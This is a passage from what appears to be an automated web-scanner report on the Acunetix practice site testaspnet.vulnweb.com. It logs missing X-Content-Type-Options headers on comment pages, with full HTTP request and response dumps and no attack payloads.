href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a 